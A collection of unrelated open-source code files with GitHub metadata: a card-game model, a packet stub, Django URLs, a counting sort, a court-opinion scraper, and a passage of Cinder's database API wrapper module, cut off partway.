'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| {
"content_hash": "8d55daae5eeb39a5d1b880871ac6ea86",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 105,
"avg_line_length": 29.166666666666668,
"alnum_prop": 0.5395238095238095,
"repo_name": "dgnorth/drift-config",
"id": "b29a881bdd4592edbc2802f6e9f6c9d53a9685a7",
"size": "2100",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1592"
},
{
"name": "Python",
"bytes": "237551"
},
{
"name": "Shell",
"bytes": "805"
}
],
"symlink_target": ""
} |
from csrv.model import modifiers
from csrv.model.cards import card_info
from csrv.model.cards import upgrade
class Card01079(upgrade.Upgrade):
    """Corp sysop upgrade: while rezzed, applies a -2 ice rez cost
    modifier scoped to this card's server."""

    NAME = u'Card01079'
    SET = card_info.CORE
    NUMBER = 79
    SIDE = card_info.CORP
    FACTION = card_info.NETCORP
    INFLUENCE = 2
    UNIQUE = True
    KEYWORDS = {
        card_info.SYSOP,
        card_info.UNORTHODOX,
    }
    COST = 1
    IMAGE_SRC = '01079.png'
    TRASH_COST = 3

    def __init__(self, game, player):
        upgrade.Upgrade.__init__(self, game, player)
        # No discount is active until the card is rezzed.
        self.modifier = None

    def build_actions(self):
        upgrade.Upgrade.build_actions(self)

    def on_rez(self):
        upgrade.Upgrade.on_rez(self)
        # Attach the -2 rez cost modifier for ice on this card's server.
        self.modifier = modifiers.IceRezCostModifier(
            self.game, -2, server=self.location.parent)

    def on_derez(self):
        # Tear down the discount when the card is derezzed.
        if not self.modifier:
            return
        self.modifier.remove()
        self.modifier = None
"content_hash": "817127d0de973cc7db0d53aa41dd27e7",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 51,
"avg_line_length": 22.526315789473685,
"alnum_prop": 0.6705607476635514,
"repo_name": "mrroach/CentralServer",
"id": "711c73a90bc850eb7f043a2f54184e64785240df",
"size": "856",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "csrv/model/cards/corp/card01079.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "23340"
},
{
"name": "JavaScript",
"bytes": "133607"
},
{
"name": "Python",
"bytes": "433045"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
from util.tipo import tipo
class S_USER_LEVELUP(object):
    """Placeholder packet handler: dumps the raw payload for inspection."""

    def __init__(self, tracker, time, direction, opcode, data):
        # Prints e.g. "S_USER_LEVELUP(12): 0A, 0B, ..." -- class name taken
        # from the module path, payload from the packet's hex dump with the
        # surrounding brackets stripped.
        label = str(type(self)).split('.')[3]
        size = str(len(data))
        payload = str(data.get_array_hex(1))[1:-1]
        print(label + '(' + size + '): ' + payload)
| {
"content_hash": "4f5f62ad47b32ac3251cadab7770fc9f",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 103,
"avg_line_length": 45.2,
"alnum_prop": 0.6150442477876106,
"repo_name": "jeff-alves/Tera",
"id": "dc0ca282ac3062f3bffbe8a4ae47483e7a8a62d4",
"size": "226",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/message/unused/S_USER_LEVELUP.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "113659"
}
],
"symlink_target": ""
} |
__author__ = "Vivek Dhayaal"
__copyright__ = "Copyright 2014, Reliance Jio Infocomm Ltd."
from django.conf.urls import patterns # noqa
from django.conf.urls import url # noqa
from horizon_jiocloud.change_phone import views
# URL routing for the change_phone views: the index page and the
# sendSms AJAX endpoint.  (Uses the legacy django patterns() API.)
urlpatterns = patterns('',
    url(r'^$', views.PhoneView.as_view(), name='index'),
    url(r'^sendSms/', views.sendSms, name='sendSms'))
| {
"content_hash": "fac484ec92b1ceb12848a63d58bd0e59",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 62,
"avg_line_length": 31.166666666666668,
"alnum_prop": 0.6844919786096256,
"repo_name": "JioCloud/horizon",
"id": "75c2a4ca54132edfe47df2e09f73a620edf95339",
"size": "419",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "horizon_jiocloud/change_phone/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "296932"
},
{
"name": "JavaScript",
"bytes": "713370"
},
{
"name": "Python",
"bytes": "3614755"
},
{
"name": "Shell",
"bytes": "15387"
}
],
"symlink_target": ""
} |
'''
Space Efficient Counting sort version. Sorts using regular counting sort
algorithm except for the fact that there is wrapping and unwrapping of values
in the array to make space efficient frequency Table in the counting sort
Time Complexity = O(N + (Max - Min))
Space Complexity = O(Max - Min)
'''
def unWrapIndex(i, minVal):
    # Map a frequency-table index back to the original value it represents.
    return minVal + i
def wrapIndex(i, minVal):
    # Shift a value down by the array minimum to get its table index.
    offset = i - minVal
    return offset
def boundCountingSort(a):
    '''
    Space-efficient counting sort.  Builds a frequency table spanning only
    [min(a), max(a)] by shifting each value down by min(a) ("wrapping") and
    shifting back ("unwrapping") when emitting the sorted output.

    Returns a tuple (frequency_table, sorted_list).

    Time Complexity  = O(N + (Max - Min))
    Space Complexity = O(Max - Min)
    '''
    # Robustness fix: the original raised ValueError on an empty input
    # (min()/max() of an empty sequence); return empty results instead.
    if not a:
        return [], []
    lo = min(a)
    hi = max(a)
    freq = [0] * (hi - lo + 1)
    for value in a:
        # wrap: shift the value into the zero-based table range
        freq[value - lo] += 1
    ordered = []
    for offset, count in enumerate(freq):
        # unwrap: shift the table index back to the original value
        ordered.extend([offset + lo] * count)
    return freq, ordered
| {
"content_hash": "5de8f20eec556cb0ba871e433aa19fc2",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 77,
"avg_line_length": 29.076923076923077,
"alnum_prop": 0.6177248677248677,
"repo_name": "tejasnikumbh/Algorithms",
"id": "6376f2ab30f56b9f4aae3677c40176819c4a497b",
"size": "756",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "genericCode/sortingAlgorithms/spaceEfficientCountingSort.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C++",
"bytes": "4292"
},
{
"name": "Java",
"bytes": "9455"
},
{
"name": "Python",
"bytes": "138746"
}
],
"symlink_target": ""
} |
from juriscraper.AbstractSite import logger
from juriscraper.lib.string_utils import convert_date_string
from juriscraper.OpinionSite import OpinionSite
class Site(OpinionSite):
    """Scraper for Iowa Supreme Court opinions.

    Walks the "recent opinions" listing (following pagination) and, in
    back-scrape mode, the opinions archive pages.  Scraped cases accumulate
    in ``self.cases`` as dicts with keys: name, docket, date, url.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.court_id = self.__module__
        self.cases = []
        # True while back-scraping archive pages (disables pagination walk).
        self.archive = False
        self.back_scrape_iterable = [
            "placeholder"
        ]  # this array can't be empty
        self.url = "https://www.iowacourts.gov/iowa-courts/supreme-court/supreme-court-opinions/"

    def _download(self, request_dict=None):
        """Fetch the current page, extract its cases, and walk pagination.

        Bug fix: the original declared ``request_dict={}``, a mutable
        default argument shared across every call; default to None and
        create a fresh dict per call instead.
        """
        if request_dict is None:
            request_dict = {}
        html = super()._download(request_dict)
        self.extract_cases(html)
        if self.test_mode_enabled() or self.archive:
            return html
        # Walk over pagination "Next" page(s), if present
        proceed = True
        while proceed:
            next_page_url = self.extract_next_page_url(html)
            if next_page_url:
                logger.info(f"Scraping next page: {next_page_url}")
                html = self._get_html_tree_by_url(next_page_url)
                self.extract_cases(html)
            else:
                proceed = False

    def _get_case_names(self):
        return [case["name"] for case in self.cases]

    def _get_download_urls(self):
        return [case["url"] for case in self.cases]

    def _get_case_dates(self):
        return [convert_date_string(case["date"]) for case in self.cases]

    def _get_precedential_statuses(self):
        return ["Published"] * len(self.case_dates)

    def _get_docket_numbers(self):
        return [case["docket"] for case in self.cases]

    def _download_backwards(self, _):
        """Walk over all "Archive" links on Archive page,
        extract cases dictionaries, and add to self.cases
        """
        self.archive = True
        self.url = f"{self.url}opinions-archive/"
        landing_page_html = self._download()
        path = '//div[@class="main-content-wrapper"]//a[contains(./text(), "Opinions Archive")]/@href'
        for archive_page_url in landing_page_html.xpath(path):
            logger.info(f"Back scraping archive page: {archive_page_url}")
            archive_page_html = self._get_html_tree_by_url(archive_page_url)
            self.extract_archive_cases(archive_page_html)

    def extract_cases(self, html):
        """Extract case dictionaries from "Recent" html page
        and add them to self.cases
        """
        case_substring = "Case No."
        case_elements = html.xpath(f'//h3[contains(., "{case_substring}")]')
        for case_element in case_elements:
            # Header text looks like "Case No. <docket>: <case name>".
            text = case_element.text_content()
            parts = text.split(":")
            docket = parts[0].replace(case_substring, "").strip()
            name = parts[1].strip()
            # Filing date is in the first following paragraph; the PDF link
            # is in the second.
            date_text = case_element.xpath("./following::p[1]")[
                0
            ].text_content()
            date_string = date_text.replace("Filed", "")
            url = case_element.xpath("./following::p[2]//a/@href")[0]
            self.cases.append(
                {
                    "name": name,
                    "docket": docket,
                    "date": date_string,
                    "url": url,
                }
            )

    def extract_archive_cases(self, html):
        """Extract case dictionaries from "Archive" html page
        and add them to self.cases
        """
        path_date = '//div[@class="cms_category_icon_title_row"]'
        for date_header in html.xpath(path_date):
            text = date_header.text_content()
            date_string = text.replace("- DELETE", "")
            path_cases = './following::div[@class="cms_items"][1]/div[@class="cms_item"]'
            for case_container in date_header.xpath(path_cases):
                docket_element = case_container.xpath(
                    './div[@class="cms_item_icon_title_row"]'
                )[0]
                self.cases.append(
                    {
                        "date": date_string,
                        "url": docket_element.xpath(".//a/@href")[0],
                        "docket": docket_element.text_content().strip(),
                        "name": case_container.xpath(
                            './div[@class="cms_item_description"]'
                        )[0]
                        .text_content()
                        .strip(),
                    }
                )

    def extract_next_page_url(self, html):
        """Return the href url from "Next" pagination element
        if it exists, otherwise return False.
        """
        path = '//div[contains(./@class, "pagination-next-page")]//a/@href'
        elements = html.xpath(path)
        return elements[0] if elements else False
| {
"content_hash": "e09c0294fa409a01977bb36eaed1d6d6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 102,
"avg_line_length": 39.95798319327731,
"alnum_prop": 0.5383806519453207,
"repo_name": "freelawproject/juriscraper",
"id": "3405e90074effa6df39a4464cace1b6c85e7b5ea",
"size": "4830",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "juriscraper/opinions/united_states/state/iowa.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "63242956"
},
{
"name": "Jinja",
"bytes": "2201"
},
{
"name": "Makefile",
"bytes": "75"
},
{
"name": "Python",
"bytes": "1059228"
}
],
"symlink_target": ""
} |
"""Defines interface for DB access.
Functions in this module are imported into the cinder.db namespace. Call these
functions from cinder.db namespace, not the cinder.db.api namespace.
All functions in this module return objects that implement a dictionary-like
interface. Currently, many of these objects are sqlalchemy objects that
implement a dictionary interface. However, a future goal is to have all of
these objects be simple dictionaries.
**Related Flags**
:connection: string specifying the sqlalchemy connection to use, like:
`sqlite:///var/lib/cinder/cinder.sqlite`.
:enable_new_services: when adding a new service to the database, is it in the
pool of available hardware (Default: True)
"""
from oslo_config import cfg
from oslo_db import concurrency as db_concurrency
from oslo_db import options as db_options
# Configuration options for the cinder DB layer: service registration
# behavior and the name templates used for volumes/snapshots/backups.
db_opts = [
    cfg.BoolOpt('enable_new_services',
                default=True,
                help='Services to be added to the available pool on create'),
    cfg.StrOpt('volume_name_template',
               default='volume-%s',
               help='Template string to be used to generate volume names'),
    cfg.StrOpt('snapshot_name_template',
               default='snapshot-%s',
               help='Template string to be used to generate snapshot names'),
    cfg.StrOpt('backup_name_template',
               default='backup-%s',
               help='Template string to be used to generate backup names'), ]

CONF = cfg.CONF
CONF.register_opts(db_opts)
db_options.set_defaults(CONF)
CONF.set_default('sqlite_db', 'cinder.sqlite', group='database')

# Only one backend is supported; IMPL lazily proxies every call below to
# cinder.db.sqlalchemy.api through oslo.db's thread-pool wrapper.
_BACKEND_MAPPING = {'sqlalchemy': 'cinder.db.sqlalchemy.api'}

IMPL = db_concurrency.TpoolDbapiWrapper(CONF, _BACKEND_MAPPING)
###################
def dispose_engine():
    """Force the engine to establish new connections."""
    # FIXME(jdg): When using sqlite if we do the dispose
    # we seem to lose our DB here.  Adding this check
    # means we don't do the dispose, but we keep our sqlite DB
    # This likely isn't the best way to handle this
    if 'sqlite' in IMPL.get_engine().name:
        return
    return IMPL.dispose_engine()
###################
def service_destroy(context, service_id):
    """Destroy the service or raise if it does not exist."""
    return IMPL.service_destroy(context, service_id)


def service_get(context, service_id):
    """Get a service or raise if it does not exist."""
    return IMPL.service_get(context, service_id)


def service_get_by_host_and_topic(context, host, topic):
    """Get a service by host it's on and topic it listens to."""
    return IMPL.service_get_by_host_and_topic(context, host, topic)


def service_get_all(context, disabled=None):
    """Get all services, optionally filtered by their disabled flag."""
    return IMPL.service_get_all(context, disabled)


def service_get_all_by_topic(context, topic, disabled=None):
    """Get all services for a given topic."""
    return IMPL.service_get_all_by_topic(context, topic, disabled=disabled)


def service_get_by_args(context, host, binary):
    """Get the state of an service by node name and binary."""
    return IMPL.service_get_by_args(context, host, binary)


def service_create(context, values):
    """Create a service from the values dictionary."""
    return IMPL.service_create(context, values)


def service_update(context, service_id, values):
    """Set the given properties on an service and update it.

    Raises NotFound if service does not exist.
    """
    return IMPL.service_update(context, service_id, values)
###################
def iscsi_target_count_by_host(context, host):
    """Return count of export devices."""
    return IMPL.iscsi_target_count_by_host(context, host)


def iscsi_target_create_safe(context, values):
    """Create an iscsi_target from the values dictionary.

    The device is not returned. If the create violates the unique
    constraints because the iscsi_target and host already exist,
    no exception is raised.
    """
    return IMPL.iscsi_target_create_safe(context, values)
###############
def volume_attach(context, values):
"""Attach a volume."""
return IMPL.volume_attach(context, values)
def volume_attached(context, volume_id, instance_id, host_name, mountpoint,
attach_mode='rw'):
"""Ensure that a volume is set as attached."""
return IMPL.volume_attached(context, volume_id, instance_id, host_name,
mountpoint, attach_mode)
def volume_create(context, values):
"""Create a volume from the values dictionary."""
return IMPL.volume_create(context, values)
def volume_data_get_for_host(context, host, count_only=False):
"""Get (volume_count, gigabytes) for project."""
return IMPL.volume_data_get_for_host(context,
host,
count_only)
def volume_data_get_for_project(context, project_id):
"""Get (volume_count, gigabytes) for project."""
return IMPL.volume_data_get_for_project(context, project_id)
def finish_volume_migration(context, src_vol_id, dest_vol_id):
"""Perform database updates upon completion of volume migration."""
return IMPL.finish_volume_migration(context, src_vol_id, dest_vol_id)
def volume_destroy(context, volume_id):
"""Destroy the volume or raise if it does not exist."""
return IMPL.volume_destroy(context, volume_id)
def volume_detached(context, volume_id, attachment_id):
"""Ensure that a volume is set as detached."""
return IMPL.volume_detached(context, volume_id, attachment_id)
def volume_get(context, volume_id):
"""Get a volume or raise if it does not exist."""
return IMPL.volume_get(context, volume_id)
def volume_get_all(context, marker, limit, sort_keys=None, sort_dirs=None,
filters=None):
"""Get all volumes."""
return IMPL.volume_get_all(context, marker, limit, sort_keys=sort_keys,
sort_dirs=sort_dirs, filters=filters)
def volume_get_all_by_host(context, host, filters=None):
"""Get all volumes belonging to a host."""
return IMPL.volume_get_all_by_host(context, host, filters=filters)
def volume_get_all_by_group(context, group_id, filters=None):
"""Get all volumes belonging to a consistency group."""
return IMPL.volume_get_all_by_group(context, group_id, filters=filters)
def volume_get_all_by_project(context, project_id, marker, limit,
sort_keys=None, sort_dirs=None, filters=None):
"""Get all volumes belonging to a project."""
return IMPL.volume_get_all_by_project(context, project_id, marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
def volume_get_iscsi_target_num(context, volume_id):
"""Get the target num (tid) allocated to the volume."""
return IMPL.volume_get_iscsi_target_num(context, volume_id)
def volume_update(context, volume_id, values):
    """Set the given properties on a volume and update it.

    Raises NotFound if volume does not exist.
    """
    return IMPL.volume_update(context, volume_id, values)
def volume_attachment_update(context, attachment_id, values):
    """Set the given properties on a volume attachment and update it."""
    return IMPL.volume_attachment_update(context, attachment_id, values)
def volume_attachment_get(context, attachment_id, session=None):
    """Get a volume attachment by id, optionally within an existing session."""
    return IMPL.volume_attachment_get(context, attachment_id, session)
def volume_attachment_get_used_by_volume_id(context, volume_id):
    """Get attachments for the given volume id.

    Presumably limited to attachments currently in use -- confirm
    against the backing sqlalchemy implementation.
    """
    return IMPL.volume_attachment_get_used_by_volume_id(context, volume_id)
def volume_attachment_get_by_host(context, volume_id, host):
return IMPL.volume_attachment_get_by_host(context, volume_id, host)
def volume_attachment_get_by_instance_uuid(context, volume_id, instance_uuid):
return IMPL.volume_attachment_get_by_instance_uuid(context, volume_id,
instance_uuid)
def volume_update_status_based_on_attachment(context, volume_id):
"""Update volume status according to attached instance id"""
return IMPL.volume_update_status_based_on_attachment(context, volume_id)
####################
def snapshot_create(context, values):
"""Create a snapshot from the values dictionary."""
return IMPL.snapshot_create(context, values)
def snapshot_destroy(context, snapshot_id):
"""Destroy the snapshot or raise if it does not exist."""
return IMPL.snapshot_destroy(context, snapshot_id)
def snapshot_get(context, snapshot_id):
"""Get a snapshot or raise if it does not exist."""
return IMPL.snapshot_get(context, snapshot_id)
def snapshot_get_all(context):
"""Get all snapshots."""
return IMPL.snapshot_get_all(context)
def snapshot_get_all_by_project(context, project_id):
"""Get all snapshots belonging to a project."""
return IMPL.snapshot_get_all_by_project(context, project_id)
def snapshot_get_by_host(context, host, filters=None):
    """Get all snapshots belonging to a host.

    :param host: Include snapshots only for the specified host.
    :param filters: Filters for the query in the form of key/value.
    """
    return IMPL.snapshot_get_by_host(context, host, filters)
def snapshot_get_all_for_cgsnapshot(context, project_id):
    """Get all snapshots belonging to a cgsnapshot.

    NOTE(review): the parameter is named *project_id* but is passed where a
    cgsnapshot identifier is expected -- the name looks like a copy-paste
    from snapshot_get_all_by_project; confirm against IMPL.
    """
    return IMPL.snapshot_get_all_for_cgsnapshot(context, project_id)
def snapshot_get_all_for_volume(context, volume_id):
"""Get all snapshots for a volume."""
return IMPL.snapshot_get_all_for_volume(context, volume_id)
def snapshot_update(context, snapshot_id, values):
    """Set the given properties on a snapshot and update it.

    Raises NotFound if snapshot does not exist.
    """
    return IMPL.snapshot_update(context, snapshot_id, values)
def snapshot_data_get_for_project(context, project_id, volume_type_id=None):
"""Get count and gigabytes used for snapshots for specified project."""
return IMPL.snapshot_data_get_for_project(context,
project_id,
volume_type_id)
def snapshot_get_active_by_window(context, begin, end=None, project_id=None):
"""Get all the snapshots inside the window.
Specifying a project_id will filter for a certain project.
"""
return IMPL.snapshot_get_active_by_window(context, begin, end, project_id)
####################
def snapshot_metadata_get(context, snapshot_id):
"""Get all metadata for a snapshot."""
return IMPL.snapshot_metadata_get(context, snapshot_id)
def snapshot_metadata_delete(context, snapshot_id, key):
"""Delete the given metadata item."""
return IMPL.snapshot_metadata_delete(context, snapshot_id, key)
def snapshot_metadata_update(context, snapshot_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.snapshot_metadata_update(context, snapshot_id,
metadata, delete)
####################
def volume_metadata_get(context, volume_id):
"""Get all metadata for a volume."""
return IMPL.volume_metadata_get(context, volume_id)
def volume_metadata_delete(context, volume_id, key):
"""Delete the given metadata item."""
return IMPL.volume_metadata_delete(context, volume_id, key)
def volume_metadata_update(context, volume_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.volume_metadata_update(context, volume_id, metadata, delete)
##################
def volume_admin_metadata_get(context, volume_id):
"""Get all administration metadata for a volume."""
return IMPL.volume_admin_metadata_get(context, volume_id)
def volume_admin_metadata_delete(context, volume_id, key):
"""Delete the given metadata item."""
return IMPL.volume_admin_metadata_delete(context, volume_id, key)
def volume_admin_metadata_update(context, volume_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.volume_admin_metadata_update(context, volume_id, metadata,
delete)
##################
def volume_type_create(context, values, projects=None):
"""Create a new volume type."""
return IMPL.volume_type_create(context, values, projects)
def volume_type_update(context, volume_type_id, values):
return IMPL.volume_type_update(context, volume_type_id, values)
def volume_type_get_all(context, inactive=False, filters=None):
"""Get all volume types.
:param context: context to query under
:param inactive: Include inactive volume types to the result set
:param filters: Filters for the query in the form of key/value.
:is_public: Filter volume types based on visibility:
* **True**: List public volume types only
* **False**: List private volume types only
* **None**: List both public and private volume types
:returns: list of matching volume types
"""
return IMPL.volume_type_get_all(context, inactive, filters)
def volume_type_get(context, id, inactive=False, expected_fields=None):
"""Get volume type by id.
:param context: context to query under
:param id: Volume type id to get.
:param inactive: Consider inactive volume types when searching
:param expected_fields: Return those additional fields.
Supported fields are: projects.
:returns: volume type
"""
return IMPL.volume_type_get(context, id, inactive, expected_fields)
def volume_type_get_by_name(context, name):
"""Get volume type by name."""
return IMPL.volume_type_get_by_name(context, name)
def volume_types_get_by_name_or_id(context, volume_type_list):
"""Get volume types by name or id."""
return IMPL.volume_types_get_by_name_or_id(context, volume_type_list)
def volume_type_qos_associations_get(context, qos_specs_id, inactive=False):
"""Get volume types that are associated with specific qos specs."""
return IMPL.volume_type_qos_associations_get(context,
qos_specs_id,
inactive)
def volume_type_qos_associate(context, type_id, qos_specs_id):
"""Associate a volume type with specific qos specs."""
return IMPL.volume_type_qos_associate(context, type_id, qos_specs_id)
def volume_type_qos_disassociate(context, qos_specs_id, type_id):
"""Disassociate a volume type from specific qos specs."""
return IMPL.volume_type_qos_disassociate(context, qos_specs_id, type_id)
def volume_type_qos_disassociate_all(context, qos_specs_id):
"""Disassociate all volume types from specific qos specs."""
return IMPL.volume_type_qos_disassociate_all(context,
qos_specs_id)
def volume_type_qos_specs_get(context, type_id):
"""Get all qos specs for given volume type."""
return IMPL.volume_type_qos_specs_get(context, type_id)
def volume_type_destroy(context, id):
"""Delete a volume type."""
return IMPL.volume_type_destroy(context, id)
def volume_get_active_by_window(context, begin, end=None, project_id=None):
"""Get all the volumes inside the window.
Specifying a project_id will filter for a certain project.
"""
return IMPL.volume_get_active_by_window(context, begin, end, project_id)
def volume_type_access_get_all(context, type_id):
"""Get all volume type access of a volume type."""
return IMPL.volume_type_access_get_all(context, type_id)
def volume_type_access_add(context, type_id, project_id):
"""Add volume type access for project."""
return IMPL.volume_type_access_add(context, type_id, project_id)
def volume_type_access_remove(context, type_id, project_id):
"""Remove volume type access for project."""
return IMPL.volume_type_access_remove(context, type_id, project_id)
####################
def volume_type_extra_specs_get(context, volume_type_id):
"""Get all extra specs for a volume type."""
return IMPL.volume_type_extra_specs_get(context, volume_type_id)
def volume_type_extra_specs_delete(context, volume_type_id, key):
"""Delete the given extra specs item."""
return IMPL.volume_type_extra_specs_delete(context, volume_type_id, key)
def volume_type_extra_specs_update_or_create(context,
volume_type_id,
extra_specs):
"""Create or update volume type extra specs. This adds or modifies the
key/value pairs specified in the extra specs dict argument
"""
return IMPL.volume_type_extra_specs_update_or_create(context,
volume_type_id,
extra_specs)
###################
def volume_type_encryption_get(context, volume_type_id, session=None):
    """Get the encryption record for a volume type, optionally in a session."""
    return IMPL.volume_type_encryption_get(context, volume_type_id, session)
def volume_type_encryption_delete(context, volume_type_id):
return IMPL.volume_type_encryption_delete(context, volume_type_id)
def volume_type_encryption_create(context, volume_type_id, encryption_specs):
return IMPL.volume_type_encryption_create(context, volume_type_id,
encryption_specs)
def volume_type_encryption_update(context, volume_type_id, encryption_specs):
return IMPL.volume_type_encryption_update(context, volume_type_id,
encryption_specs)
def volume_type_encryption_volume_get(context, volume_type_id, session=None):
return IMPL.volume_type_encryption_volume_get(context, volume_type_id,
session)
def volume_encryption_metadata_get(context, volume_id, session=None):
return IMPL.volume_encryption_metadata_get(context, volume_id, session)
###################
def qos_specs_create(context, values):
"""Create a qos_specs."""
return IMPL.qos_specs_create(context, values)
def qos_specs_get(context, qos_specs_id):
"""Get all specification for a given qos_specs."""
return IMPL.qos_specs_get(context, qos_specs_id)
def qos_specs_get_all(context, inactive=False, filters=None):
"""Get all qos_specs."""
return IMPL.qos_specs_get_all(context, inactive, filters)
def qos_specs_get_by_name(context, name):
"""Get all specification for a given qos_specs."""
return IMPL.qos_specs_get_by_name(context, name)
def qos_specs_associations_get(context, qos_specs_id):
"""Get all associated volume types for a given qos_specs."""
return IMPL.qos_specs_associations_get(context, qos_specs_id)
def qos_specs_associate(context, qos_specs_id, type_id):
"""Associate qos_specs from volume type."""
return IMPL.qos_specs_associate(context, qos_specs_id, type_id)
def qos_specs_disassociate(context, qos_specs_id, type_id):
"""Disassociate qos_specs from volume type."""
return IMPL.qos_specs_disassociate(context, qos_specs_id, type_id)
def qos_specs_disassociate_all(context, qos_specs_id):
"""Disassociate qos_specs from all entities."""
return IMPL.qos_specs_disassociate_all(context, qos_specs_id)
def qos_specs_delete(context, qos_specs_id):
"""Delete the qos_specs."""
return IMPL.qos_specs_delete(context, qos_specs_id)
def qos_specs_item_delete(context, qos_specs_id, key):
"""Delete specified key in the qos_specs."""
return IMPL.qos_specs_item_delete(context, qos_specs_id, key)
def qos_specs_update(context, qos_specs_id, specs):
"""Update qos specs.
This adds or modifies the key/value pairs specified in the
specs dict argument for a given qos_specs.
"""
return IMPL.qos_specs_update(context, qos_specs_id, specs)
###################
def volume_glance_metadata_create(context, volume_id, key, value):
"""Update the Glance metadata for the specified volume."""
return IMPL.volume_glance_metadata_create(context,
volume_id,
key,
value)
def volume_glance_metadata_get_all(context):
"""Return the glance metadata for all volumes."""
return IMPL.volume_glance_metadata_get_all(context)
def volume_glance_metadata_get(context, volume_id):
"""Return the glance metadata for a volume."""
return IMPL.volume_glance_metadata_get(context, volume_id)
def volume_snapshot_glance_metadata_get(context, snapshot_id):
"""Return the Glance metadata for the specified snapshot."""
return IMPL.volume_snapshot_glance_metadata_get(context, snapshot_id)
def volume_glance_metadata_copy_to_snapshot(context, snapshot_id, volume_id):
"""Update the Glance metadata for a snapshot.
This will copy all of the key:value pairs from the originating volume,
to ensure that a volume created from the snapshot will retain the
original metadata.
"""
return IMPL.volume_glance_metadata_copy_to_snapshot(context, snapshot_id,
volume_id)
def volume_glance_metadata_copy_to_volume(context, volume_id, snapshot_id):
"""Update the Glance metadata from a volume (created from a snapshot).
This will copy all of the key:value pairs from the originating snapshot,
to ensure that the Glance metadata from the original volume is retained.
"""
return IMPL.volume_glance_metadata_copy_to_volume(context, volume_id,
snapshot_id)
def volume_glance_metadata_delete_by_volume(context, volume_id):
"""Delete the glance metadata for a volume."""
return IMPL.volume_glance_metadata_delete_by_volume(context, volume_id)
def volume_glance_metadata_delete_by_snapshot(context, snapshot_id):
"""Delete the glance metadata for a snapshot."""
return IMPL.volume_glance_metadata_delete_by_snapshot(context, snapshot_id)
def volume_glance_metadata_copy_from_volume_to_volume(context,
src_volume_id,
volume_id):
"""Update the Glance metadata for a volume by copying all of the key:value
pairs from the originating volume.
This is so that a volume created from the volume (clone) will retain the
original metadata.
"""
return IMPL.volume_glance_metadata_copy_from_volume_to_volume(
context,
src_volume_id,
volume_id)
###################
def quota_create(context, project_id, resource, limit):
"""Create a quota for the given project and resource."""
return IMPL.quota_create(context, project_id, resource, limit)
def quota_get(context, project_id, resource):
"""Retrieve a quota or raise if it does not exist."""
return IMPL.quota_get(context, project_id, resource)
def quota_get_all_by_project(context, project_id):
"""Retrieve all quotas associated with a given project."""
return IMPL.quota_get_all_by_project(context, project_id)
def quota_update(context, project_id, resource, limit):
"""Update a quota or raise if it does not exist."""
return IMPL.quota_update(context, project_id, resource, limit)
def quota_destroy(context, project_id, resource):
"""Destroy the quota or raise if it does not exist."""
return IMPL.quota_destroy(context, project_id, resource)
###################
def quota_class_create(context, class_name, resource, limit):
"""Create a quota class for the given name and resource."""
return IMPL.quota_class_create(context, class_name, resource, limit)
def quota_class_get(context, class_name, resource):
"""Retrieve a quota class or raise if it does not exist."""
return IMPL.quota_class_get(context, class_name, resource)
def quota_class_get_default(context):
"""Retrieve all default quotas."""
return IMPL.quota_class_get_default(context)
def quota_class_get_all_by_name(context, class_name):
"""Retrieve all quotas associated with a given quota class."""
return IMPL.quota_class_get_all_by_name(context, class_name)
def quota_class_update(context, class_name, resource, limit):
"""Update a quota class or raise if it does not exist."""
return IMPL.quota_class_update(context, class_name, resource, limit)
def quota_class_destroy(context, class_name, resource):
"""Destroy the quota class or raise if it does not exist."""
return IMPL.quota_class_destroy(context, class_name, resource)
def quota_class_destroy_all_by_name(context, class_name):
"""Destroy all quotas associated with a given quota class."""
return IMPL.quota_class_destroy_all_by_name(context, class_name)
###################
def quota_usage_get(context, project_id, resource):
"""Retrieve a quota usage or raise if it does not exist."""
return IMPL.quota_usage_get(context, project_id, resource)
def quota_usage_get_all_by_project(context, project_id):
"""Retrieve all usage associated with a given resource."""
return IMPL.quota_usage_get_all_by_project(context, project_id)
###################
def quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=None):
"""Check quotas and create appropriate reservations."""
return IMPL.quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=project_id)
def reservation_commit(context, reservations, project_id=None):
"""Commit quota reservations."""
return IMPL.reservation_commit(context, reservations,
project_id=project_id)
def reservation_rollback(context, reservations, project_id=None):
"""Roll back quota reservations."""
return IMPL.reservation_rollback(context, reservations,
project_id=project_id)
def quota_destroy_all_by_project(context, project_id):
"""Destroy all quotas associated with a given project."""
return IMPL.quota_destroy_all_by_project(context, project_id)
def reservation_expire(context):
"""Roll back any expired reservations."""
return IMPL.reservation_expire(context)
###################
def backup_get(context, backup_id):
"""Get a backup or raise if it does not exist."""
